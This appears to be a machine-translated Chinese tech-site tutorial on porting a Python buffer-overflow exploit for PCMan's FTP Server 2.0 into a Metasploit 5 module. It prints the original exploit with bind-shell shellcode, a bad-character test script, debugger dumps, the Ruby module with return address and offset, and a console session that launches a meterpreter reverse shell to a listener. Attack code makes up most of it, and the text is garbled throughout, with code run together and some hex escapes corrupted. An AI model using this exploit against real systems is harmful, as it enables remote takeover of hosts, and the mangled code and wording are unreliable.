Shulou(Shulou.com)06/02 Report--

How to understand the transplantation and verification of test modules in Metasploit 5? I believe that many inexperienced people do not know what to do about it. Therefore, this paper summarizes the causes and solutions of the problems. Through this article, I hope you can solve this problem.

Preface

If there is a corresponding penetration module for a program or software, it is unnecessary to write a module to achieve similar functions at this time. However, not all infiltration modules are developed based on the Metasploit framework, and many of them are written in Perl, Python, or Champact +, so these modules cannot be used directly in Metasploit. At this time, it is necessary to transplant the existing infiltration module into a module compatible with the Metasploit framework. After the migration is successful, it can not only achieve the functions of the original module, but also use a variety of rich and powerful tools provided by the Metasploit framework to deal with routine tasks. At the same time, the attack load can be dynamically switched to make the penetration module suitable for more scenarios.

Experimental environment 1. Infiltration host: Kali-Linux-2019.1-vm-amd642. Target host: Windows XP SP3 Simplified Chinese3. Software version: PCMan's FTP Server 2. 0 involves tools 1. Python-2.7.152. Analysis of ImmunityDebugger1.85 Penetration Module

In this paper, taking PCMan's FTP Server software as an example, the migration and testing process of infiltration module are described in detail. This software is developed by National Yangming University in Taiwan Province of China. It is also a small, lightweight and easy-to-use FTP software that I like. It can quickly build a FTP server within five minutes. There is a buffer overflow vulnerability of the off-the-shelf penetration module for PCMan's FTP Server.

1. The detailed code of the infiltration module is as follows:

#! / usr/bin/env python#-*- coding: utf-8-*-# Exploit Title: PCMan FTP Server 2.0PORT Command BoF Exploit# Author: Pablo Gonz á lez # Date: 4Accord 11 Software: PCMan 2.31 Tested on: Windows XP Profesional SP3 Spanish x86import socketprint "Creating malicious input!" junk ='\ x41century 2007 ret= "\ xf7\ x56\ x3c\ x7e" # User32.dll 7E3C56F7nops ='\ x90'*20#msfvenom-p windows/shell_bind_tcp LPORT=1144-b '\ x0a\ x00\ x0d'-fc # put shellcode in variable' sc'sc= ("\ xdb\ xd6\ xba\ xd3\ x95\ x1b\ xd0\ x74\ x24\ xf4\ x58\ x2b\ xc9\ xb1"\ x53\ x31\ xe8\ x83\ xfc\ x83\ x86\ xf9\ x25\ xdf\ x41\ x7f"\ xc5\ x1f\ x92\ xe0\ xfa\ xa3\ x20\ x2b\ x8f\ x94\ x3f\ xdd\ x18 " X5a\ x6d\ xf5\ xab\ X2e\ xba\ xfa\ X1c\ x84\ x9c\ X35\ X9c\ xb5\ xdd\ x54 "\ X1e\ xc4\ X31\ xb6\ x07\ x44\ xb7\ x58\ x7a\ xe5\ x31\ xf0\ x18"\ x19\ x35\ x4c\ xa1\ x92\ x05\ X40\ xa1\ X47\ xdd\ x63\ x80\ xd6\ x55\ x3a "\ X02\ xd9\ xba\ X36\ x0b\ xc1\ xdf\ x73 xc5\ x7a\ x2b\ x3a Xd4\ xaa\ x65 ""\ xf0\ x7b\ x93\ x49\ x03\ x85\ xd4\ x6e\ xfc\ xf0\ x2c\ x8d\ x81\ x02\ xeb "\ xef\ x5d\ x86\ xef\ x48\ x15\ xcb\ x69\ xa7\ x98\ x98\ xb7"\ xc6\ x6a\ x46\ x60\ x7d\ x96\ xc3\ x87\ x51\ x1e\ x97\ xa3\ x75\ x7a\ x43 "\ xcd\ x2c\ x26\ x22\ xf2\ x2e\ x9b\ x9b X56\ x25\ x24\ xcf\ xea\ x64\ x21 "\ X3c\ xc7\ x96\ xb1\ X2a\ X50\ xe5\ x83\ xf5\ xca\ x61\ xa8\ x7e\ xd5\ x76"\ xcf\ x54\ xe8\ x2e\ x57\ xd2\ x21"\ x99\ xe1\ xf9\ xe4\ x91\ X52\ x1b\ X5c\ X36\ X02\ xce\ xdf\ x48 "\ x14\ x31\ xff\ x72\ Xfe\ x5a\ x68\ x8f\ X01\ x11\ x06\ xe7\ x02\ xf1 "\ x4e\ xbf\ xba\ x33\ xb5\ x08\ x5d\ x4b\ x9f\ x20\ xc9\ x04\ xf7\ xf6"\ x94\ xdf\ x5f\ x60\ x1f\ x91\ x20\ x19\ xcc\ xc6\ xb7\ xd7\ x9d "\ xa5\ x26\ xe7\ xb7\ x5d\ xca\ x7a\ x5c\ x9d\ x85\ x66 xcb\ xca\ x59" X02\ x9e\ xfe\ xc0\ xbc\ xbc\ x02\ x94\ x04\ xd9\ x65\ x09\ x85\ xac "\ xd2\ x2d\ x95\ xda\ x69\ xc1\ x24\ x8d\ x27\ xbf\ x67\ x86\ x69"\ x5d\ xdb\ x40\ xfd\ x17\ x53\ x7b\ x25\ x72\ x25\ x94\ x2b\ x70 "\ x9c\ x19\ xbc\ x74\ xe5\ x47\ x5c\ x7a\ xcc\ x3c\ x3c\ x31 X1c\ x65\ xe5 ""\ x9c\ xf5\ x37\ x68\ x1f\ x20\ x7b\ x95\ x9c\ xc0\ x04\ x62\ xbc\ xa1 ""\ x2e\ x7a\ x5a\ x78\ x3f\ xef\ x5c\ x2f\ x40\ X3a ") buffer= junk + ret + nops + scs=socket.socket (socket.AF_INET) Socket.SOCK_STREAM) ip = raw_input ('Give me Remote IP Address:') connect=s.connect ((ip,21)) banner = s.recv (1024) print banners.send (' USER anonymous\ r\ n') s.recv (1024) s.send ('PASS\ r\ n') s.recv (1024) # Sending input PORT command (Exploitation is coming) s.send (' PORT' + buffer +'\ r\ n') s.close ()

two。 Key information collection

3. The methods and steps to determine the offset Offset, if not clear, can refer to the article "Writing and testing of infiltration Modules on buffer overflow vulnerabilities in CVE-2019-9766", which will not be discussed in detail here.

4. The JMP ESP instruction of the existing module uses the address 7E3C56F7 corresponding to User32.dll, but the module is written based on Windows XP Profesional SP3 Spanish x86, where the Spanish XP is obviously not applicable. So use the command! mona jmp-r esp to query the appropriate jump instruction in ImmunityDebugger, and the result of the mona query is saved in the file jmp.txt. Here we choose

C:\ WINDOWS\ system32\ USER32.dll

The corresponding address is 0x77d29353, and the query result is shown below:

5. With regard to bad characters in shellcode, you can use the mona plug-in in ImmunityDebugger to help determine. Here we use a principle method to find bad characters, although the process is a bit tedious, but with high accuracy. The test code is as follows (where the variable shellcode is assigned to all possible characters):

# Exploit Title: PCMan FTP Server 2.0PORT Command Exploit# Author: Neroqi# Date: 5Accord 14Universe 20mm Software: PCMan 2.0mm Tested on: Windows XP Profesional SP3 Simplified Chineseimport socketjunk ='\ x41cards / 2007retters'\ x42cards 4 # USER32.dll 0x77d29353nops ='\ x90'*20shellcode = ("\ X00\ X01\ X02\ X03\ X04\ X06\ X07\ x08\ x09\ X0a\ X0b\ X0c\ X0d\ X0e\ X0f"\ X10\ X11\ X12\ x13 X14\ x15\ x17\ x18\ x19\ x1a\ x1b\ x1c\ x1d\ x1e\ x1f ""\ x20\ x21\ x23\ x24\ x25\ x26\ x28\ x29\ x2a\ x2b\ x2d\ x2e\ x2f ""\ x30\ x31\ x32\ x33\ x35\ x36\ x38\ x39\ X3a\ X3b\ X3d\ X3e\ X3f ""\ X40\ x41\ x42\ x44\ x45\ x47\ x48\ x49\ X3b " X4a\ x4b\ x4c\ x4d\ x4e\ x4f "\ x50\ x51\ x52\ x53\ x55\ x56\ x58\ x59\ x5a\ x5b\ x5c\ x5d\ x5e\ x5f"\ x60\ x61\ x62\ x63\ x65\ x66\ x68\ x69\ x6a\ x6c\ x6d\ x6e\ x6f ""\ x70\ x71\ x72\ x74\ x74\ x76\ x78\ x79\ x7b\ x7c\ x7d\ x7f " "\ x80\ x81\ x82\ x83\ x85\ x86\ x87\ x88\ x89\ x8a\ x8c\ x8d\ x8d\ x8f"\ x90\ x91\ x92\ x93\ x94\ x96\ x97\ x98\ x9a\ x9b\ x9c\ x9d\ x9e\ x9f"\ xa0\ xa1\ xa2\ xa3\ xa5\ xa6\ xa7\ xa8\ xa9\ xaa\ xab\ xac\ xad\ xae\ xaf"\ xb0\ xb1\ xb2\ xb3\" Xb4\ xb5\ xb6\ xb7\ xb8\ xb9\ xba\ xbb\ xbc\ xbd\ xbe\ xbf "\ xc0\ xc1\ xc2\ xc3\ xc4\ xc5\ xc6\ xc7\ xc8\ xc9\ xca\ xcb\ xcc\ xcd\ xce\ xcf"\ xd0\ xd1\ xd2\ xd3\ xd4\ xd5\ xd6\ xd7\ xd8\ xd8\ xd9\ xda\ xd9\ xd9\ xd9 Xea\ xeb\ xec\ xed\ xee\ xef ""\ xf0\ xf1\ xf2\ xf3\ xf4\ xf5\ xf6\ xf7\ xf8\ xf9\ xfa\ xfb\ xfc\ xfd\ xfe\ xff ") buffer= junk + ret + nops + shellcodes = socket.socket (socket.AF_INET Socket.SOCK_STREAM) ip = raw_input ('Input FTP Server IP Address:') connect = s.connect ((ip,21)) s.recv (1024) s.send (' USER anonymous\ r\ n') s.recv (1024) s.send ('PASS\ r\ n') s.recv (1024) # Sending input PORT command (Exploitation is coming) s.send (' PORT' + buffer +'\ r\ n') s.close ()

5.1 run the above code in Kali Linux, enter the IP address of PCMan's FTP Server, send all possible characters to PCMan's FTP, and then the display in ImmunityDebugger is as follows (too much, some of it is excerpted here):

0012C7D4 41414141 AAAA0012C7D8 42424242 BBBB0012C7DC 90909090 "0012C7E0 90909090" 0012C7E4 90909090 "0012C7E8 90909090" 0012C7EC 90909090 "0012C7F0 00000A0D.... 0012C7F4 0000000A.... 0012C7F8 00000000.... 0012C7FC 00000000.... 0012C800 00000000.... 0012C804 00000000.... 0012C808 00000000.... 0012C80C 00000000.... 0012C810 00000000.... 0012C814 00000066 f...0012C818 77EF6BF2 cargo GDI32.77EF6BF2

The content of shellcode is not seen in the above results.\ x0D\ x0A after 20 empty instructions'\ x90' represents'\ r\ n' ("), not part of the characters in shellcode, so'\ x00' can be judged to be a bad character.

5.2 remove the'\ x00' from shellcode, repeat the operation in 5.1and then the display in ImmunityDebugger is as follows:

0012C7D4 41414141 AAAA0012C7D8 42424242 BBBB0012C7DC 90909090 "0012C7E0 90909090"0012C7E4 90909090"0012C7E8 90909090"0012C7EC 90909090" 0012C7F0 04030201 0012C7F4 08070605 0012C7F8 000A0D09.... 0012C7FC 00000000.... 0012C800 00000000.... 0012C804 00000000.... 0012C808 00000002... 0012C80C 00000000.... 0012C810 00000000.... 0012C814 000000AC?.. 0012C818 77EF6BF2 cargo GDI32.77EF6BF22.4

From the above results, we can see that all the contents of shellcode after'\ x09' are lost, so'\ x0a' can be judged to be a bad character. Repeat steps 5.1 and 5.2 to determine that all bad characters are'\ x00\ x0a\ x0d'.

Transplantation of infiltration module

After the analysis of the existing infiltration module, let's transplant the infiltration module.

1. The first part of the migrated infiltration module pcman_port.rb is as follows:

Require 'msf/core'class MetasploitModule

"PCMan's FTP Server PORT Command Stack Buffer Overflow", 'Description' = > "This module exploits a buffer overflow vulnerability found in the PORT command of the PCMan's FTP Server v2.0",' Author' = > 'Neroqi',' License' = > MSF_LICENSE, 'References' = > [' EDB', '40714']] 'DefaultOptions' = > {' EXITFUNC' = > 'process',' VERBOSE' = > true}, 'Payload' = > {' Space' = > 1000, 'BadChars' = > "\ x00\ x0a\ x0d",},' Platform' = > 'win',' Targets' = > [['Windows XP Profesional SP3 Simplified Chinese'' {'Ret' = > 0x77d29353, # C:\ WINDOWS\ system32\ USER32.dll' Offset' = > 2007}],], 'DisclosureDate' = >' May 14 2019, 'DefaultTarget' = > 0) register_options ([Opt::RPORT (21), OptString.new (' FTPUSER', [true) 'FTP User',' anonymous']), OptString.new ('FTPPASS', [true,' FTP Password', 'anonymous'])], self.class) end

1.1 the statement require 'msf/core' introduces all the contents of the core library in Metasploit, and the statement include Msf::Exploit::Remote::Ftp introduces ftp. Rb library file, used for subsequent FTP-related operations.

Method initialize defines the relevant information and parameters of the module, including Name, Description, Author and DefaultOptions, etc., in which bad characters are set in Payload and Offset and JMP ESP instructions are set in Targets.

1.3 register_options defines the target port using the Opt::RPORT function, and uses the OptString.new function to provide a user name and password for the login of FTP.

two。 The second part of the migrated infiltration module pcman_port.rb is as follows:

Def exploit c = connect_login return unless c sploit = rand_text_alpha (target ['Offset']) sploit 192.168.188.137msf5 exploit (windows/ftp/pcman_port) > set payload windows/meterpreter/reverse_tcppayload = > windows/meterpreter/reverse_tcpmsf5 exploit (windows/ftp/pcman_port) > set LHOST 192.168.188.136LHOST = > 192.168.188.136msf5 exploit (windows/ftp/pcman_port) > set LPORT 8888LPORT = > 8888msf5 exploit (windows/ftp/pcman_port) > exploit

As shown in the following figure, you can see that the meterpreter session with the target host has been successfully obtained, indicating that the module has been migrated successfully:

Because of the powerful function and rich tool library of Metasploit, it is recommended that when you encounter a newer and better infiltration module, you should transplant it to the Metasploit framework in time for later use.

After reading the above, have you mastered how to understand the migration and verification of test modules in Metasploit 5? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.